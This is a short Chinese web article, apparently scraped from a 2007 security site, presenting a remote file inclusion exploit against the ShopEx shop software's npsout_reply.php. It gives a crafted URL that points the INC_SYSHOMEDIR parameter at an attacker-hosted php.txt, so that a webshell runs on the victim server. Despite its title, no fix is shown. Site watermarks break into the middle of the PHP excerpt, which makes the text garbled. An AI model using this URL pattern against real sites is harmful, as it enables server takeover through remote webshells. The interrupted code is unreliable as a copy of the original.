SHOPEX最新漏洞利用及解决方案
时间:2007-10-27 来源:不详 作者:林仙
$m_ocomment = $orderArray[16];
$modate = $orderArray[17];
$Status = $orderArray[18];
if ($Status == 2)
{
$Order = newclass("Order");
$Order->shopId = $INC_SHOPID;
$Order->payid = $m_orderid;
$arr_paytime = getUnixtime(); //支付时间
$Order->onlinePayed($arr_paytime[0], $arr_paytime[1]);
copyright dedecms
$tmp_orderno = $Order->getorderidbyPayid($Order->payid); //拿出商店订单号
$state = 2 ;
$strinfo = $PROG_TAGS["ptag_1334"];
}
else{
$state = 1 ;
$strinfo = $PROG_TAGS["ptag_1335"];
}
}else{
$state = 0 ;
$strinfo = $PROG_TAGS["ptag_1336"];
}
Header("Location: ./index.php?gOo=pay_reply.dwt&orderid=".$tmp_orderno."&state=".$state."&strinfo=".urlencode($strinfo));
?>
dedecms.com
假设在 http://www.sagi.net.cn 根目录下有个include文件夹,里面有PayFunction.php文件(这是我们自己构造的,当然文件的内容可是小马也可是大马 呵呵) 本文来自织梦
漏洞实战:
织梦内容管理系统
构造URL:
http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
注意:
[http://www.sagi.net.cn/php.txt?] 其实并没有在 http://www.sagi.net.cn 所在的服务器上执行而是在 "http://www.xxxx.com" 上执行的。
文章评论
共有位Admini5网友发表了评论 查看完整内容